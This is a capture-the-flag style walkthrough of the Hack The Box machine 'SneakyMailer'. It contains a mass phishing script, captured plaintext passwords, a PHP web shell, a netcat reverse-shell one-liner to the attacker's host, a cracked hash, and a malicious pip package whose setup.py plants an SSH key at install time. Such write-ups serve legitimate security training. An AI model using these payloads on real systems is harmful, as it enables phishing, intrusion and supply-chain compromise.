Hello fellow hackers,
From nmap scan I have 7 open ports.
# Nmap 7.80 scan initiated Wed Sep 9 05:06:25 2020 as: nmap -sC -sV -oN initial 10.10.10.197
Nmap scan report for 10.10.10.197
Host is up (0.078s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
| 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp open imap Courier Imapd (released 2018)
|_imap-capabilities: ACL2=UNION CHILDREN SORT THREAD=REFERENCES NAMESPACE UIDPLUS CAPABILITY OK UTF8=ACCEPTA0001 IMAP4rev1 THREAD=ORDEREDSUBJECT completed QUOTA IDLE ENABLE STARTTLS ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: ACL2=UNION CHILDREN SORT THREAD=REFERENCES AUTH=PLAIN UIDPLUS CAPABILITY OK UTF8=ACCEPTA0001 IMAP4rev1 THREAD=ORDEREDSUBJECT completed QUOTA NAMESPACE ENABLE IDLE ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open http nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 9 05:07:08 2020 -- 1 IP address (1 host up) scanned in 43.31 seconds
As always first I go to port 80, visiting this website I have a dashboard but I can't do much with it. I go to team.php and I can see the list of all employees of the company. directory brute force also didn't give me anything. Looking at nmap again we have smtp open at port 25.
Smtp or Simple mail transfer protocol is a protocol which handles the email transfer. So this protocol can be used to send emails. imap on the other hand is used to receive the email. Having smtp open at port 25 we can use telnet and try to send emails to the previously emails we found at team.php
.
kali@kali:~/Desktop/SneakyMailer/nmap$ telnet 10.10.10.197 25
Trying 10.10.10.197...
Connected to 10.10.10.197.
Escape character is '^]'.
220 debian ESMTP Postfix (Debian/GNU)
MAIL FROM: anything@htb.com
250 2.1.0 Ok
RCPT TO: someemail@htb.com
454 4.7.1 <someemail@htb.com>: Relay access denied
RCPT TO:airisatou@sneakymailer.htb
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
hello there friend.
.
250 2.0.0 Ok: queued as 5A0B024689
So we successfully send an email to one of the email addresses found on the team.php. Maybe we can send a link and see if someone from these emails clicks it. But first of all we need to get all email addresses from team.php. You can do that by using cewl.
cewl -n -e --email_file mailid.txt http://sneakycorp.htb
this will output a file mailid.txt with all the email addresses. And then to automate the whole process of sending an email to each email address I created a python script. I will also setup a listener on my machine.
#!/usr/bin/python
import smtplib
smtpObj = smtplib.SMTP('10.10.10.197')
sender = 'fuxsocy@htb.com'
message = "Check this out http://10.10.14.188"
with open("../email/mailid.txt") as mails:
emails = [line.strip() for line in mails.read().split("\n") if line]
for i in emails:
smtpObj.sendmail(sender, i, message)
print("Successfully sent email")
A user clicked send us these parameters. I am going to decode this because this is url encoded.
firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(JuhqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju
hqcHl<:Ht
I have the password of an email address now. I tried to use this on the ssh port, but failed to do so. I also tried to use this on ftp but also failed.
But as this is an email address I can use this one in the imap server to authenticate. I download evolution which is an email client and then login as paulbyrd and the password found.
Inside the send email folder. One email has credentials inside of it.
Hello administrator, I want to change this password for the developer account
Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
Please notify me when you do it
I then use this password against ftp. and successfully logged in. I also have the permission to upload files to the server inside /dev/ folder. I create a simple php shell script, and upload it, using put command.
<?php
echo exec($_GET['fuxsocy']);
?>
But I wasn't able to find the script on the web app on port 80. So maybe it is hidden into another folder, but that wasn't the case. I did a little subdomain discovery using wfuzz and found another sub.domain.
This finds another subdomain, called dev. I edit /etc/hosts files and include that subdomain. Upon visiting that subdomain I try to gain rce with the file i previously uploaded via ftp.
At this moment I try to get back a reverse shell to me. By running this file but url-encoded
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IPHERE 8989 >/tmp/f
Looking inside /var/www we have 3 folders 2 of them belong to different subdomains and 1 is /html, I try to explore pypi.sneakycorp.htb as this is new to me. Inside of it is a .htpasswd file, containg a hash along with a username.
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Looking at hashcat hashing examples the hash is mode 1600 , I use rockyou.txt and find the password soufianeelhaoui
for the pypi server.
Pypiserver is a repo of all the python packages you want to fetch with pip. You can also create your own and store your own packages there. We have the password and the username so we can use both of these to upload our own packages at the server. Reading this post from linode I get a understanding on what should I do in order to upload my own package on the server. Let's break it down one by one create one:
Our directory structure should look like this, where package_htb is our package name.
package_htb/
package_htb/
__init__.py
setup.py
setup.cfg
I create these inside /dev/shm/
you can also use /tmp/
or any directory with write access to.
__init__.py :
def hello_word():
print("hello world")
Inside this file we can execute our own code as long as the package goes to the server, enumerating I found a user in which I can read authorized_keys but I cannot write so I will create a ssh key-pair in my local machine and then write the public key to the user low
on the machine.
ssh-keygen -t ed25519
I am using ed25519 because the ouput of the pub key is short and I wont mess the python code with new lines etc.
setup.py :
from setuptools import setup
try:
with open("/home/low/.ssh/authorized_keys", 'w') as f:
f.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEBu9PghaYMY4ap+f/M7Z2LnkRyaYEIH7EphN6xV2Zug kali@kali")
except:
setup(
name = 'package_htb',
packages = ['package_htb'],
description = 'Hello world enterprise edition',
version = '0.1',
url = 'http://pypi.sneakycorp.htb/package_htb',
author = 'package_htb',
author_email = 'fuxsocy@sneaky.com',
keywords = ['pip', 'gis', 'example']
)
setup.cfg:
[metadata]
description-file = README.md
To upload this package on the server we need to create another file containing the password we found.
.pypirc:
[distutils]
index-servers =
pypi
package_htb
[pypi]
username:
password:
[package_htb]
repository: http://127.0.0.1:5000
username: pypi
password: soufianeelhaoui
The server port was found using netstat and then I used wget to verify it was that port.
Now we need to compress the package
python3 setup.py sdist
Set Home directory to current path
$export HOME=/dev/shm/package_htb
Upload the package to server
python3 setup.py sdist upload -r package_htb
Now our ssh pub key was written to low
user profile so we can access low
user with ssh protocol.
User low
can run pip3 as sudo without a password.
Visiting gtfobins we can use that to gain root access on the system.
We can find some scripts inside /opt directory which automate the email click and the ftp file delete. Looking at those scripts we can learn more about php and python3.